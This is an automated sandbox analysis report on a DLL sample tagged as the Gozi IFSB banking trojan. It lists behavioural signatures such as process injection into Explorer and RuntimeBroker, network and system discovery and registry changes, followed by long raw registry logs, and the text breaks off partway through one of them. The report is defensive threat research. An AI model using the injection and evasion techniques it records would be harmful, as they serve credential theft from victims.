Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-lgswrahfd2
Target 62ea3f935563b.dll
SHA256 982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

Threat Level: Known bad

The file 62ea3f935563b.dll was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Gathers system information

Discovers systems in the same network

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 09:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 09:30

Reported

2022-08-03 09:33

Platform

win7-20220715-en

Max time kernel

53s

Max time network

48s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Network

N/A

Files

memory/1940-54-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

memory/1296-55-0x0000000000000000-mapping.dmp

memory/1296-56-0x00000000762A1000-0x00000000762A3000-memory.dmp

memory/1296-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1296-62-0x00000000001E0000-0x00000000001ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 09:30

Reported

2022-08-03 09:33

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

150s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4384 set thread context of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2648 set thread context of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 set thread context of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 set thread context of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 set thread context of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 set thread context of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e94784b92ca7d801c1a6e3b92ca7d801c1a6e3b92ca7d8018ff70a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000616464343033306661653061393663656564306564353033396534366236323936653839346662326639383863393865346539383038623337623662633565320000b20009000400efbe0355115c0355115c2e00000000000000000000000000000000000000000000000000ab059900610064006400340030003300300066006100650030006100390036006300650065006400300065006400350030003300390065003400360062003600320039003600650038003900340066006200320066003900380038006300390038006500340065003900380030003800620033003700620036006200630035006500320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61646434303330666165306139366365656430656435303339653436623632393665383934666232663938386339386534653938303862333762366263356532000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a7314d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a7314d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007a54abb82ca7d8017a54abb82ca7d8017a54abb82ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000613035646464333661333564343164383430373133346465643431623833313931366236336530346363626463336465313134313733353436646536363639330000b20009000400efbe0355115c0355115c2e0000000000000000000000000000000000000000000000000086a0d400610030003500640064006400330036006100330035006400340031006400380034003000370031003300340064006500640034003100620038003300310039003100360062003600330065003000340063006300620064006300330064006500310031003400310037003300350034003600640065003600360036003900330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61303564646433366133356434316438343037313334646564343162383331393136623633653034636362646333646531313431373335343664653636363933000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a6914d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a6914d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = 61e70bb92ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\add4030fae0a96ceed0ed5039e46b6296e894fb2f988c98e4e9808b37b6bc5e2" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f43bf5b82ca7d801f43bf5b82ca7d801f43bf5b82ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000613133313765333937613733663438643164653337316665663065666561653430653539613064343466663639356264303031646164393033303736383735360000b20009000400efbe0355115c0355115c2e000000000000000000000000000000000000000000000000000cb98a00610031003300310037006500330039003700610037003300660034003800640031006400650033003700310066006500660030006500660065006100650034003000650035003900610030006400340034006600660036003900350062006400300030003100640061006400390030003300300037003600380037003500360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61313331376533393761373366343864316465333731666566306566656165343065353961306434346666363935626430303164616439303330373638373536000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a6b14d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a6b14d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3adca56c5abdcdb858510c61faa733008065d521ca4a91ca9d66e6d6b0a95b3c" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a05ddd36a35d41d8407134ded41b831916b63e04ccbdc3de114173546de66693" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\323e5136-11f4-4ce9- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\37a5dc662a21e2e4f39235304b188e73bc2e198a60d3cbaa712dc378bc941121" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a1317e397a73f48d1de371fef0efeae40e59a0d44ff695bd001dad9030768756" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\add4030fae0a96ceed0ed5039e46b6296e894fb2f988c98e4e9808b37b6bc5e2" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000006fc56b92ca7d801ca5bd5b92ca7d801ca5bd5b92ca7d80173b508000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e000000000000000000000000000000000000000